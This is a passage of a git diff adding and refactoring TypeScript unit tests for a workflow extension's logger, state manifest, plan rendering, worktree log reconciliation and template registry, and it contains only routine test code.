+      logWarning("manifest", "write slow");
+      const summary = summarizeLogs()!;
+      assert.ok(summary.includes("2 warning(s)"));
+      assert.ok(!summary.includes("error"));
+    });
+
+    test("does not clear buffer", () => {
+      logError("intercept", "blocked");
+      summarizeLogs();
+      assert.equal(peekLogs().length, 1);
+    });
+  });
+
+  describe("formatForNotification", () => {
+    test("returns empty string for empty array", () => {
+      assert.equal(formatForNotification([]), "");
+    });
+
+    test("formats single entry without line breaks", () => {
+      logError("intercept", "blocked write");
+      const entries = drainLogs();
+      const formatted = formatForNotification(entries);
+      assert.equal(formatted, "[intercept] blocked write");
+    });
+
+    test("formats multiple entries with line breaks", () => {
+      logWarning("projection", "render failed");
+      logError("intercept", "blocked write");
+      const entries = drainLogs();
+      const formatted = formatForNotification(entries);
+      assert.ok(formatted.includes("[projection] render failed"));
+      assert.ok(formatted.includes("[intercept] blocked write"));
+      assert.ok(formatted.includes("\n"));
+    });
+
+    test("includes context fields in formatted output", () => {
+      logError("tool", "failed", { cmd: "complete_task" });
+      const entries = drainLogs();
+      const formatted = formatForNotification(entries);
+      assert.equal(formatted, "[tool] failed (cmd: complete_task)");
+    });
+
+    test("excludes error key from context to avoid redundancy", () => {
+      logError("tool", "disk write failed", { error: "ENOSPC", path: "/tmp/foo" });
+      const entries = drainLogs();
+      const formatted = formatForNotification(entries);
+      assert.ok(formatted.includes("path: /tmp/foo"));
+      assert.ok(!formatted.includes("error: ENOSPC"));
+    });
+
+    test("formats entry without context unchanged", () => {
+      logError("intercept", "blocked write");
+      const entries = drainLogs();
+      const formatted = formatForNotification(entries);
+      assert.equal(formatted, "[intercept] blocked write");
+    });
+  });
+
+  describe("audit log persistence", () => {
+    let dir: string;
+
+    beforeEach(() => {
+      dir = makeTempDir("wl-audit-");
+    });
+
+    afterEach(() => {
+      setLogBasePath("");
+      cleanup(dir);
+    });
+
+    test("writes entry to .gsd/audit-log.jsonl after setLogBasePath", () => {
+      setLogBasePath(dir);
+      logError("engine", "audit test entry");
+
+      const auditPath = join(dir, ".gsd", "audit-log.jsonl");
+      assert.ok(existsSync(auditPath), "audit-log.jsonl should exist");
+      const content = readFileSync(auditPath, "utf-8");
+      const entry = JSON.parse(content.trim());
+      assert.equal(entry.severity, "error");
+      assert.equal(entry.component, "engine");
+      assert.equal(entry.message, "audit test entry");
+    });
+
+    test("_resetLogs does not clear the audit base path", () => {
+      setLogBasePath(dir);
+      _resetLogs();
+      logError("engine", "post-reset entry");
+
+      const auditPath = join(dir, ".gsd", "audit-log.jsonl");
+      assert.ok(existsSync(auditPath), "audit-log.jsonl should exist after _resetLogs");
+      const content = readFileSync(auditPath, "utf-8");
+      const entry = JSON.parse(content.trim());
+      assert.equal(entry.message, "post-reset entry");
+    });
+  });
+
+  describe("buffer limit", () => {
+    test("caps at MAX_BUFFER entries, dropping oldest", () => {
+      const OVER = 110;
+      const MAX = 100;
+      for (let i = 0; i < OVER; i++) {
+        logWarning("engine", `msg-${i}`);
+      }
+      const entries = peekLogs();
+      assert.equal(entries.length, MAX);
+      // First MAX entries dropped; oldest surviving = msg-(OVER-MAX)
+      assert.equal(entries[0].message, `msg-${OVER - MAX}`);
+      assert.equal(entries[MAX - 1].message, `msg-${OVER - 1}`);
+    });
+  });
+
+  describe("new log components (db, dispatch)", () => {
+    test("logError with 'db' component stores correct component", () => {
+      logError("db", "failed to copy DB to worktree", { error: "ENOENT" });
+      const entries = peekLogs();
+      assert.equal(entries.length, 1);
+      assert.equal(entries[0].severity, "error");
+      assert.equal(entries[0].component, "db");
+      assert.equal(entries[0].message, "failed to copy DB to worktree");
+      assert.deepEqual(entries[0].context, { error: "ENOENT" });
+    });
+
+    test("logError with 'dispatch' component stores correct component", () => {
+      logError("dispatch", "reactive graph derivation failed", { error: "timeout" });
+      const entries = peekLogs();
+      assert.equal(entries.length, 1);
+      assert.equal(entries[0].severity, "error");
+      assert.equal(entries[0].component, "dispatch");
+      assert.deepEqual(entries[0].context, { error: "timeout" });
+    });
+
+    test("logWarning with 'reconcile' component for centralized logging path", () => {
+      logWarning("reconcile", "could not acquire sync lock — another reconciliation may be in progress");
+      const entries = peekLogs();
+      assert.equal(entries.length, 1);
+      assert.equal(entries[0].severity, "warn");
+      assert.equal(entries[0].component, "reconcile");
+    });
+
+    test("summarizeLogs includes db and dispatch entries", () => {
+      logError("db", "worktree DB reconciliation failed: path contains unsafe characters");
+      logWarning("dispatch", "graph derivation timeout");
+      const summary = summarizeLogs()!;
+      assert.ok(summary.includes("1 error(s)"));
+      assert.ok(summary.includes("1 warning(s)"));
+      assert.ok(summary.includes("unsafe characters"));
+      assert.ok(summary.includes("graph derivation timeout"));
+    });
+
+    test("formatForNotification renders db and dispatch components", () => {
+      logError("db", "copy failed");
+      logWarning("dispatch", "slow derivation");
+      const entries = drainLogs();
+      const formatted = formatForNotification(entries);
+      assert.ok(formatted.includes("[db] copy failed"));
+      assert.ok(formatted.includes("[dispatch] slow derivation"));
+    });
+  });
+
+  describe("stderr output", () => {
+    test("writes WARN prefix to stderr for warnings", (t) => {
+      const written: string[] = [];
+      const orig = process.stderr.write.bind(process.stderr);
+      // @ts-ignore — patching for test
+      process.stderr.write = (chunk: string) => { written.push(chunk); return true; };
+      t.after(() => { process.stderr.write = orig; });
+
+      logWarning("engine", "test warn");
+      assert.equal(written.length, 1);
+      assert.ok(written[0].includes("[gsd:engine] WARN: test warn"));
+    });
+
+    test("writes ERROR prefix to stderr for errors", (t) => {
+      const written: string[] = [];
+      const orig = process.stderr.write.bind(process.stderr);
+      // @ts-ignore — patching for test
+      process.stderr.write = (chunk: string) => { written.push(chunk); return true; };
+      t.after(() => { process.stderr.write = orig; });
+
+      logError("intercept", "blocked");
+      assert.ok(written[0].includes("[gsd:intercept] ERROR: blocked"));
+    });
+
+    test("includes serialized context in stderr output", (t) => {
+      const written: string[] = [];
+      const orig = process.stderr.write.bind(process.stderr);
+      // @ts-ignore — patching for test
+      process.stderr.write = (chunk: string) => { written.push(chunk); return true; };
+      t.after(() => { process.stderr.write = orig; });
+
+      logError("tool", "failed", { cmd: "complete_task" });
+      assert.ok(written[0].includes('"cmd":"complete_task"'));
+    });
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/workflow-manifest.test.ts b/src/resources/extensions/gsd/tests/workflow-manifest.test.ts
new file mode 100644
index 000000000..5e4591f9d
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/workflow-manifest.test.ts
@@ -0,0 +1,278 @@
+// GSD Extension — workflow-manifest unit tests
+// Tests writeManifest, readManifest, snapshotState, bootstrapFromManifest.
+
+import test from 'node:test';
+import assert from 'node:assert/strict';
+import * as fs from 'node:fs';
+import * as path from 'node:path';
+import * as os from 'node:os';
+import {
+  openDatabase,
+  closeDatabase,
+  insertMilestone,
+  insertSlice,
+  insertTask,
+  _getAdapter,
+} from '../gsd-db.ts';
+import {
+  writeManifest,
+  readManifest,
+  snapshotState,
+  bootstrapFromManifest,
+} from '../workflow-manifest.ts';
+
+function tempDir(): string {
+  return fs.mkdtempSync(path.join(os.tmpdir(), 'gsd-manifest-'));
+}
+
+function tempDbPath(base: string): string {
+  return path.join(base, 'test.db');
+}
+
+function cleanupDir(dirPath: string): void {
+  try { fs.rmSync(dirPath, { recursive: true, force: true }); } catch { /* best effort */ }
+}
+
+// ─── readManifest: no file ────────────────────────────────────────────────
+
+test('workflow-manifest: readManifest returns null when file does not exist', () => {
+  const base = tempDir();
+  try {
+    const result = readManifest(base);
+    assert.strictEqual(result, null);
+  } finally {
+    cleanupDir(base);
+  }
+});
+
+// ─── writeManifest + readManifest round-trip ─────────────────────────────
+
+test('workflow-manifest: writeManifest creates state-manifest.json with version 1', () => {
+  const base = tempDir();
+  openDatabase(tempDbPath(base));
+  try {
+    writeManifest(base);
+    const manifestPath = path.join(base, '.gsd', 'state-manifest.json');
+    assert.ok(fs.existsSync(manifestPath), 'state-manifest.json should exist');
+    const raw = JSON.parse(fs.readFileSync(manifestPath, 'utf-8'));
+    assert.strictEqual(raw.version, 1);
+  } finally {
+    closeDatabase();
+    cleanupDir(base);
+  }
+});
+
+test('workflow-manifest: readManifest parses manifest written by writeManifest', () => {
+  const base = tempDir();
+  openDatabase(tempDbPath(base));
+  try {
+    writeManifest(base);
+    const manifest = readManifest(base);
+    assert.ok(manifest !== null);
+    assert.strictEqual(manifest!.version, 1);
+    assert.ok(typeof manifest!.exported_at === 'string');
+    assert.ok(Array.isArray(manifest!.milestones));
+    assert.ok(Array.isArray(manifest!.slices));
+    assert.ok(Array.isArray(manifest!.tasks));
+    assert.ok(Array.isArray(manifest!.decisions));
+    assert.ok(Array.isArray(manifest!.verification_evidence));
+  } finally {
+    closeDatabase();
+    cleanupDir(base);
+  }
+});
+
+// ─── snapshotState: captures DB rows ─────────────────────────────────────
+
+test('workflow-manifest: snapshotState includes inserted milestone', () => {
+  const base = tempDir();
+  openDatabase(tempDbPath(base));
+  try {
+    insertMilestone({ id: 'M001', title: 'Auth Milestone' });
+    const snap = snapshotState();
+    assert.strictEqual(snap.version, 1);
+    const m = snap.milestones.find((r) => r.id === 'M001');
+    assert.ok(m !== undefined, 'M001 should appear in snapshot');
+    assert.strictEqual(m!.title, 'Auth Milestone');
+  } finally {
+    closeDatabase();
+    cleanupDir(base);
+  }
+});
+
+test('workflow-manifest: snapshotState captures tasks', () => {
+  const base = tempDir();
+  openDatabase(tempDbPath(base));
+  try {
+    insertMilestone({ id: 'M001' });
+    insertSlice({ id: 'S01', milestoneId: 'M001' });
+    insertTask({ id: 'T01', sliceId: 'S01', milestoneId: 'M001', title: 'Do thing', status: 'complete' });
+    const snap = snapshotState();
+    const t = snap.tasks.find((r) => r.id === 'T01');
+    assert.ok(t !== undefined, 'T01 should appear in snapshot');
+    assert.strictEqual(t!.status, 'complete');
+  } finally {
+    closeDatabase();
+    cleanupDir(base);
+  }
+});
+
+// ─── bootstrapFromManifest ────────────────────────────────────────────────
+
+test('workflow-manifest: bootstrapFromManifest returns false when no manifest file', () => {
+  const base = tempDir();
+  openDatabase(tempDbPath(base));
+  try {
+    const result = bootstrapFromManifest(base);
+    assert.strictEqual(result, false);
+  } finally {
+    closeDatabase();
+    cleanupDir(base);
+  }
+});
+
+test('workflow-manifest: bootstrapFromManifest restores DB from manifest (round-trip)', () => {
+  const base = tempDir();
+  openDatabase(tempDbPath(base));
+  try {
+    // Insert data and write manifest
+    insertMilestone({ id: 'M001', title: 'Restored Milestone' });
+    insertSlice({ id: 'S01', milestoneId: 'M001', title: 'Restored Slice' });
+    insertTask({ id: 'T01', sliceId: 'S01', milestoneId: 'M001', title: 'Restored Task', status: 'complete' });
+    writeManifest(base);
+    closeDatabase();
+
+    // Open a fresh DB and bootstrap from manifest
+    const newDbPath = path.join(base, 'new.db');
+    openDatabase(newDbPath);
+    const result = bootstrapFromManifest(base);
+    assert.strictEqual(result, true, 'bootstrapFromManifest should return true');
+
+    // Verify restored state
+    const snap = snapshotState();
+    const m = snap.milestones.find((r) => r.id === 'M001');
+    assert.ok(m !== undefined, 'M001 should be restored');
+    assert.strictEqual(m!.title, 'Restored Milestone');
+
+    const s = snap.slices.find((r) => r.id === 'S01');
+    assert.ok(s !== undefined, 'S01 should be restored');
+
+    const t = snap.tasks.find((r) => r.id === 'T01');
+    assert.ok(t !== undefined, 'T01 should be restored');
+    assert.strictEqual(t!.status, 'complete');
+  } finally {
+    closeDatabase();
+    cleanupDir(base);
+  }
+});
+
+// ─── snapshotState: numeric column coercion (#2962) ─────────────────────
+
+test('workflow-manifest: snapshotState coerces string placeholders in numeric columns to null (#2962)', () => {
+  const base = tempDir();
+  openDatabase(tempDbPath(base));
+  try {
+    // Set up prerequisite rows
+    insertMilestone({ id: 'M001' });
+    insertSlice({ id: 'S01', milestoneId: 'M001' });
+    insertTask({ id: 'T01', sliceId: 'S01', milestoneId: 'M001', title: 'Task', status: 'complete' });
+
+    // Insert verification_evidence with string placeholders in numeric columns
+    // This simulates what happens after schema migrations or manual inserts
+    const db = _getAdapter()!;
+    db.prepare(
+      `INSERT INTO verification_evidence (task_id, slice_id, milestone_id, command, exit_code, verdict, duration_ms, created_at)
+       VALUES (?, ?, ?, ?, ?, ?, ?, ?)`,
+    ).run('T01', 'S01', 'M001', 'npm test', '-', 'pass', '-', new Date().toISOString());
+
+    // snapshotState should coerce "-" to null for numeric columns
+    const snap = snapshotState();
+    const ev = snap.verification_evidence[0];
+    assert.strictEqual(ev.exit_code, null, 'exit_code "-" should be coerced to null');
+    assert.strictEqual(ev.duration_ms, null, 'duration_ms "-" should be coerced to null');
+
+    // Round-trip through JSON should not throw
+    const json = JSON.stringify(snap, null, 2);
+    const reparsed = JSON.parse(json);
+    assert.strictEqual(reparsed.verification_evidence[0].exit_code, null);
+    assert.strictEqual(reparsed.verification_evidence[0].duration_ms, null);
+  } finally {
+    closeDatabase();
+    cleanupDir(base);
+  }
+});
+
+test('workflow-manifest: snapshotState coerces empty string and N/A in numeric columns (#2962)', () => {
+  const base = tempDir();
+  openDatabase(tempDbPath(base));
+  try {
+    insertMilestone({ id: 'M001' });
+    insertSlice({ id: 'S01', milestoneId: 'M001' });
+    insertTask({ id: 'T01', sliceId: 'S01', milestoneId: 'M001', title: 'Task', status: 'complete' });
+
+    const db = _getAdapter()!;
+    db.prepare(
+      `INSERT INTO verification_evidence (task_id, slice_id, milestone_id, command, exit_code, verdict, duration_ms, created_at)
+       VALUES (?, ?, ?, ?, ?, ?, ?, ?)`,
+    ).run('T01', 'S01', 'M001', 'npm test', 'N/A', 'pass', '', new Date().toISOString());
+
+    const snap = snapshotState();
+    const ev = snap.verification_evidence[0];
+    assert.strictEqual(ev.exit_code, null, 'exit_code "N/A" should be coerced to null');
+    assert.strictEqual(ev.duration_ms, null, 'duration_ms "" should be coerced to null');
+  } finally {
+    closeDatabase();
+    cleanupDir(base);
+  }
+});
+
+test('workflow-manifest: snapshotState coerces string placeholders in sequence columns (#2962)', () => {
+  const base = tempDir();
+  openDatabase(tempDbPath(base));
+  try {
+    insertMilestone({ id: 'M001' });
+
+    // Insert a slice with a string sequence via raw SQL
+    const db = _getAdapter()!;
+    db.prepare(
+      `INSERT INTO slices (milestone_id, id, title, status, risk, depends, demo, created_at, sequence)
+       VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?)`,
+    ).run('M001', 'S01', 'Test Slice', 'planned', 'low', '[]', '', new Date().toISOString(), '-');
+
+    db.prepare(
+      `INSERT INTO tasks (milestone_id, slice_id, id, title, status, sequence)
+       VALUES (?, ?, ?, ?, ?, ?)`,
+    ).run('M001', 'S01', 'T01', 'Test Task', 'planned', 'N/A');
+
+    const snap = snapshotState();
+    assert.strictEqual(snap.slices[0].sequence, 0, 'slice sequence "-" should be coerced to 0');
+    assert.strictEqual(snap.tasks[0].sequence, 0, 'task sequence "N/A" should be coerced to 0');
+
+    // JSON round-trip must not throw
+    const json = JSON.stringify(snap, null, 2);
+    assert.doesNotThrow(() => JSON.parse(json));
+  } finally {
+    closeDatabase();
+    cleanupDir(base);
+  }
+});
+
+// ─── readManifest: version check ─────────────────────────────────────────
+
+test('workflow-manifest: readManifest throws on unsupported version', () => {
+  const base = tempDir();
+  try {
+    fs.mkdirSync(path.join(base, '.gsd'), { recursive: true });
+    fs.writeFileSync(
+      path.join(base, '.gsd', 'state-manifest.json'),
+      JSON.stringify({ version: 99, exported_at: '', milestones: [], slices: [], tasks: [], decisions: [], verification_evidence: [] }),
+    );
+    assert.throws(
+      () => readManifest(base),
+      /Unsupported manifest version/,
+      'should throw on version mismatch',
+    );
+  } finally {
+    cleanupDir(base);
+  }
+});
diff --git a/src/resources/extensions/gsd/tests/workflow-projections.test.ts b/src/resources/extensions/gsd/tests/workflow-projections.test.ts
new file mode 100644
index 000000000..b9379ede8
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/workflow-projections.test.ts
@@ -0,0 +1,173 @@
+// GSD Extension — workflow-projections unit tests
+// Tests the pure rendering functions (no DB required).
+
+import test from 'node:test';
+import assert from 'node:assert/strict';
+import { renderPlanContent } from '../workflow-projections.ts';
+import type { SliceRow, TaskRow } from '../gsd-db.ts';
+
+// ─── Test fixtures ────────────────────────────────────────────────────────
+
+function makeSlice(overrides: Partial<SliceRow> = {}): SliceRow {
+  return {
+    id: 'S01',
+    milestone_id: 'M001',
+    title: 'Auth Layer',
+    status: 'active',
+    risk: 'high',
+    depends: [],
+    demo: 'Login flow works end-to-end',
+    goal: 'Implement JWT authentication',
+    full_summary_md: '',
+    full_uat_md: '',
+    success_criteria: '',
+    proof_level: '',
+    integration_closure: '',
+    observability_impact: '',
+    created_at: '2026-01-01T00:00:00Z',
+    completed_at: null,
+    sequence: 1,
+    replan_triggered_at: null,
+    ...overrides,
+  };
+}
+
+function makeTask(overrides: Partial<TaskRow> = {}): TaskRow {
+  return {
+    id: 'T01',
+    slice_id: 'S01',
+    milestone_id: 'M001',
+    title: 'Create JWT middleware',
+    status: 'pending',
+    description: 'Implement JWT validation middleware',
+    estimate: '2h',
+    files: ['src/middleware/auth.ts'],
+    verify: 'npm test src/middleware/auth.test.ts',
+    one_liner: '',
+    narrative: '',
+    verification_result: '',
+    duration: '',
+    completed_at: null,
+    blocker_discovered: false,
+    deviations: '',
+    known_issues: '',
+    key_files: [],
+    key_decisions: [],
+    full_summary_md: '',
+    full_plan_md: '',
+    inputs: [],
+    expected_output: [],
+    observability_impact: '',
+    sequence: 1,
+    ...overrides,
+  };
+}
+
+// ─── renderPlanContent: structure ────────────────────────────────────────
+
+test('workflow-projections: renderPlanContent starts with H1 containing slice id and title', () => {
+  const content = renderPlanContent(makeSlice(), []);
+  assert.ok(content.startsWith('# S01: Auth Layer'), `expected H1, got: ${content.slice(0, 60)}`);
+});
+
+test('workflow-projections: renderPlanContent includes Goal line', () => {
+  const content = renderPlanContent(makeSlice(), []);
+  assert.ok(content.includes('**Goal:** Implement JWT authentication'));
+});
+
+test('workflow-projections: renderPlanContent includes Demo line', () => {
+  const content = renderPlanContent(makeSlice(), []);
+  assert.ok(content.includes('**Demo:** After this: Login flow works end-to-end'));
+});
+
+test('workflow-projections: renderPlanContent falls back to TBD when goal and full_summary_md are empty', () => {
+  const slice = makeSlice({ goal: '', full_summary_md: '' });
+  const content = renderPlanContent(slice, []);
+  assert.ok(content.includes('**Goal:** TBD'));
+});
+
+test('workflow-projections: renderPlanContent falls back to TBD when goal is empty (full_summary_md ignored #2945)', () => {
+  const slice = makeSlice({ goal: '', full_summary_md: 'Fallback goal text' });
+  const content = renderPlanContent(slice, []);
+  // #2945: full_summary_md is no longer used as a fallback — it contains
+  // multi-line rendered markdown that corrupts single-line fields.
+  assert.ok(content.includes('**Goal:** TBD'), `expected TBD fallback, got: ${content}`);
+});
+
+test('workflow-projections: renderPlanContent includes ## Tasks section', () => {
+  const content = renderPlanContent(makeSlice(), []);
+  assert.ok(content.includes('## Tasks'));
+});
+
+// ─── renderPlanContent: task checkboxes ──────────────────────────────────
+
+test('workflow-projections: pending task renders with [ ] checkbox', () => {
+  const task = makeTask({ status: 'pending' });
+  const content = renderPlanContent(makeSlice(), [task]);
+  assert.ok(content.includes('- [ ] **T01:'), `expected unchecked, got: ${content}`);
+});
+
+test('workflow-projections: done task renders with [x] checkbox', () => {
+  const task = makeTask({ status: 'done' });
+  const content = renderPlanContent(makeSlice(), [task]);
+  assert.ok(content.includes('- [x] **T01:'), `expected checked, got: ${content}`);
+});
+
+test('workflow-projections: complete status renders with [x] checkbox', () => {
+  const task = makeTask({ status: 'complete' }); // 'complete' and 'done' both → checked
+  const content = renderPlanContent(makeSlice(), [task]);
+  assert.ok(content.includes('- [x] **T01:'));
+});
+
+// ─── renderPlanContent: task sublines ────────────────────────────────────
+
+test('workflow-projections: task with estimate renders Estimate subline', () => {
+  const task = makeTask({ estimate: '2h' });
+  const content = renderPlanContent(makeSlice(), [task]);
+  assert.ok(content.includes('  - Estimate: 2h'));
+});
+
+test('workflow-projections: task with empty estimate omits Estimate subline', () => {
+  const task = makeTask({ estimate: '' });
+  const content = renderPlanContent(makeSlice(), [task]);
+  assert.ok(!content.includes('  - Estimate:'));
+});
+
+test('workflow-projections: task with files renders Files subline', () => {
+  const task = makeTask({ files: ['src/auth.ts', 'src/auth.test.ts'] });
+  const content = renderPlanContent(makeSlice(), [task]);
+  assert.ok(content.includes('  - Files: src/auth.ts, src/auth.test.ts'));
+});
+
+test('workflow-projections: task with empty files array omits Files subline', () => {
+  const task = makeTask({ files: [] });
+  const content = renderPlanContent(makeSlice(), [task]);
+  assert.ok(!content.includes('  - Files:'));
+});
+
+test('workflow-projections: task with verify renders Verify subline', () => {
+  const task = makeTask({ verify: 'npm test' });
+  const content = renderPlanContent(makeSlice(), [task]);
+  assert.ok(content.includes('  - Verify: npm test'));
+});
+
+test('workflow-projections: task with no verify omits Verify subline', () => {
+  const task = makeTask({ verify: '' });
+  const content = renderPlanContent(makeSlice(), [task]);
+  assert.ok(!content.includes('  - Verify:'));
+});
+
+test('workflow-projections: task with duration renders Duration subline', () => {
+  const task = makeTask({ duration: '45m' });
+  const content = renderPlanContent(makeSlice(), [task]);
+  assert.ok(content.includes('  - Duration: 45m'));
+});
+
+test('workflow-projections: multiple tasks rendered in order', () => {
+  const t1 = makeTask({ id: 'T01', title: 'First task', sequence: 1 });
+  const t2 = makeTask({ id: 'T02', title: 'Second task', sequence: 2 });
+  const content = renderPlanContent(makeSlice(), [t1, t2]);
+  const idxT1 = content.indexOf('**T01:');
+  const idxT2 = content.indexOf('**T02:');
+  assert.ok(idxT1 < idxT2, 'T01 should appear before T02');
+});
diff --git a/src/resources/extensions/gsd/tests/workflow-reconcile.test.ts b/src/resources/extensions/gsd/tests/workflow-reconcile.test.ts
new file mode 100644
index 000000000..e1103262c
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/workflow-reconcile.test.ts
@@ -0,0 +1,91 @@
+import test, { afterEach } from "node:test";
+import assert from "node:assert/strict";
+import { mkdtempSync, mkdirSync, rmSync, existsSync } from "node:fs";
+import { join } from "node:path";
+import { tmpdir } from "node:os";
+
+import { appendEvent, readEvents } from "../workflow-events.ts";
+import { listConflicts, reconcileWorktreeLogs, resolveConflict } from "../workflow-reconcile.ts";
+import { closeDatabase } from "../gsd-db.ts";
+
+const tmpDirs: string[] = [];
+
+function makeTmpRepo(): { main: string; worktree: string } {
+  const root = mkdtempSync(join(tmpdir(), "workflow-reconcile-"));
+  const main = join(root, "main");
+  const worktree = join(root, "worktree");
+  mkdirSync(main, { recursive: true });
+  mkdirSync(worktree, { recursive: true });
+  tmpDirs.push(root);
+  return { main, worktree };
+}
+
+afterEach(() => {
+  closeDatabase();
+  for (const dir of tmpDirs) {
+    try {
+      rmSync(dir, { recursive: true, force: true });
+    } catch {
+      // Best-effort cleanup on platforms that keep files open briefly.
+    }
+  }
+  tmpDirs.length = 0;
+});
+
+test("resolveConflict(pick=main) rewrites the worktree log durably", () => {
+  const { main, worktree } = makeTmpRepo();
+
+  appendEvent(main, {
+    cmd: "plan_milestone",
+    params: { milestoneId: "M001", title: "Base Milestone" },
+    ts: "2026-01-01T00:00:00.000Z",
+    actor: "agent",
+  });
+  appendEvent(worktree, {
+    cmd: "plan_milestone",
+    params: { milestoneId: "M001", title: "Base Milestone" },
+    ts: "2026-01-01T00:00:00.000Z",
+    actor: "agent",
+  });
+
+  appendEvent(main, {
+    cmd: "plan_milestone",
+    params: { milestoneId: "M001", title: "Main Choice" },
+    ts: "2026-01-01T00:01:00.000Z",
+    actor: "agent",
+  });
+
+  appendEvent(worktree, {
+    cmd: "plan_milestone",
+    params: { milestoneId: "M001", title: "Worktree Choice" },
+    ts: "2026-01-01T00:01:00.000Z",
+    actor: "agent",
+  });
+
+  const initial = reconcileWorktreeLogs(main, worktree);
+  assert.equal(initial.conflicts.length, 1, "expected one conflict before resolution");
+  assert.ok(listConflicts(main).length === 1, "CONFLICTS.md should exist after detection");
+
+  resolveConflict(main, worktree, "milestone:M001", "main");
+
+  assert.equal(listConflicts(main).length, 0, "conflict file should be cleared after resolving main");
+  const conflictsPath = join(main, ".gsd", "CONFLICTS.md");
+  assert.equal(
+    existsSync(conflictsPath),
+    false,
+    "CONFLICTS.md should be removed after the last conflict is resolved",
+  );
+
+  const wtEvents = readEvents(join(worktree, ".gsd", "event-log.jsonl"));
+  assert.ok(
+    wtEvents.some((e) => e.cmd === "plan_milestone" && e.params.title === "Main Choice"),
+    "worktree log should be rewritten to the main-side resolution",
+  );
+  assert.ok(
+    !wtEvents.some((e) => e.cmd === "plan_milestone" && e.params.title === "Worktree Choice"),
+    "worktree log should no longer contain the discarded conflict event",
+  );
+
+  const second = reconcileWorktreeLogs(main, worktree);
+  assert.equal(second.conflicts.length, 0, "reconcile should stay clean after choosing main");
+});
diff --git a/src/resources/extensions/gsd/tests/workflow-templates.test.ts b/src/resources/extensions/gsd/tests/workflow-templates.test.ts
index 05a169dce..3aa0c9673 100644
--- a/src/resources/extensions/gsd/tests/workflow-templates.test.ts
+++ b/src/resources/extensions/gsd/tests/workflow-templates.test.ts
@@ -2,7 +2,8 @@
 //
 // Tests registry loading, template resolution, auto-detection, and listing.
 
-import { createTestContext } from './test-helpers.ts';
+import { test } from 'node:test';
+import assert from 'node:assert/strict';
 import {
   loadRegistry,
   resolveByName,
@@ -12,7 +13,6 @@ import {
   loadWorkflowTemplate,
 } from '../workflow-templates.ts';
 
-const { assertEq, assertTrue, assertMatch, report } = createTestContext();
 
 // ═══════════════════════════════════════════════════════════════════════════
 // Registry Loading
@@ -22,23 +22,23 @@ console.log('\n── Registry Loading ──');
 
 {
   const registry = loadRegistry();
-  assertTrue(registry !== null, 'Registry should load');
-  assertEq(registry.version, 1, 'Registry version should be 1');
-  assertTrue(Object.keys(registry.templates).length >= 8, 'Should have at least 8 templates');
+  assert.ok(registry !== null, 'Registry should load');
+  assert.deepStrictEqual(registry.version, 1, 'Registry version should be 1');
+  assert.ok(Object.keys(registry.templates).length >= 8, 'Should have at least 8 templates');
 
   // Verify required template keys exist
   const expectedIds = ['full-project', 'bugfix', 'small-feature', 'refactor', 'spike', 'hotfix', 'security-audit', 'dep-upgrade'];
   for (const id of expectedIds) {
-    assertTrue(id in registry.templates, `Template "${id}" should exist in registry`);
+    assert.ok(id in registry.templates, `Template "${id}" should exist in registry`);
   }
 
   // Verify each template has required fields
   for (const [id, entry] of Object.entries(registry.templates)) {
-    assertTrue(typeof entry.name === 'string' && entry.name.length > 0, `${id}: name should be non-empty string`);
-    assertTrue(typeof entry.description === 'string' && entry.description.length > 0, `${id}: description should be non-empty`);
-    assertTrue(typeof entry.file === 'string' && entry.file.endsWith('.md'), `${id}: file should be a .md path`);
-    assertTrue(Array.isArray(entry.phases) && entry.phases.length > 0, `${id}: phases should be non-empty array`);
-    assertTrue(Array.isArray(entry.triggers) && entry.triggers.length > 0, `${id}: triggers should be non-empty array`);
+    assert.ok(typeof entry.name === 'string' && entry.name.length > 0, `${id}: name should be non-empty string`);
+    assert.ok(typeof entry.description === 'string' && entry.description.length > 0, `${id}: description should be non-empty`);
+    assert.ok(typeof entry.file === 'string' && entry.file.endsWith('.md'), `${id}: file should be a .md path`);
+    assert.ok(Array.isArray(entry.phases) && entry.phases.length > 0, `${id}: phases should be non-empty array`);
+    assert.ok(Array.isArray(entry.triggers) && entry.triggers.length > 0, `${id}: triggers should be non-empty array`);
   }
 }
 
@@ -51,31 +51,31 @@ console.log('\n── Resolve by Name ──');
 {
   // Exact match
   const bugfix = resolveByName('bugfix');
-  assertTrue(bugfix !== null, 'Should resolve "bugfix"');
-  assertEq(bugfix!.id, 'bugfix', 'ID should be "bugfix"');
-  assertEq(bugfix!.confidence, 'exact', 'Exact name should have exact confidence');
+  assert.ok(bugfix !== null, 'Should resolve "bugfix"');
+  assert.deepStrictEqual(bugfix!.id, 'bugfix', 'ID should be "bugfix"');
+  assert.deepStrictEqual(bugfix!.confidence, 'exact', 'Exact name should have exact confidence');
 
   // Case-insensitive name match
   const spike = resolveByName('Research Spike');
-  assertTrue(spike !== null, 'Should resolve "Research Spike" by name');
-  assertEq(spike!.id, 'spike', 'Should resolve to spike');
+  assert.ok(spike !== null, 'Should resolve "Research Spike" by name');
+  assert.deepStrictEqual(spike!.id, 'spike', 'Should resolve to spike');
 
   // Alias match
   const bug = resolveByName('bug');
-  assertTrue(bug !== null, 'Should resolve "bug" alias');
-  assertEq(bug!.id, 'bugfix', 'Alias "bug" should map to bugfix');
+  assert.ok(bug !== null, 'Should resolve "bug" alias');
+  assert.deepStrictEqual(bug!.id, 'bugfix', 'Alias "bug" should map to bugfix');
 
   const feat = resolveByName('feat');
-  assertTrue(feat !== null, 'Should resolve "feat" alias');
-  assertEq(feat!.id, 'small-feature', 'Alias "feat" should map to small-feature');
+  assert.ok(feat !== null, 'Should resolve "feat" alias');
+  assert.deepStrictEqual(feat!.id, 'small-feature', 'Alias "feat" should map to small-feature');
 
   const deps = resolveByName('deps');
-  assertTrue(deps !== null, 'Should resolve "deps" alias');
-  assertEq(deps!.id, 'dep-upgrade', 'Alias "deps" should map to dep-upgrade');
+  assert.ok(deps !== null, 'Should resolve "deps" alias');
+  assert.deepStrictEqual(deps!.id, 'dep-upgrade', 'Alias "deps" should map to dep-upgrade');
 
   // No match
   const missing = resolveByName('nonexistent-template');
-  assertTrue(missing === null, 'Should return null for unknown template');
+  assert.ok(missing === null, 'Should return null for unknown template');
 }
 
 // ═══════════════════════════════════════════════════════════════════════════
@@ -87,32 +87,32 @@ console.log('\n── Auto-Detection ──');
 {
   // Should detect bugfix from "fix" keyword
   const fixMatches = autoDetect('fix the login button');
-  assertTrue(fixMatches.length > 0, 'Should detect matches for "fix the login button"');
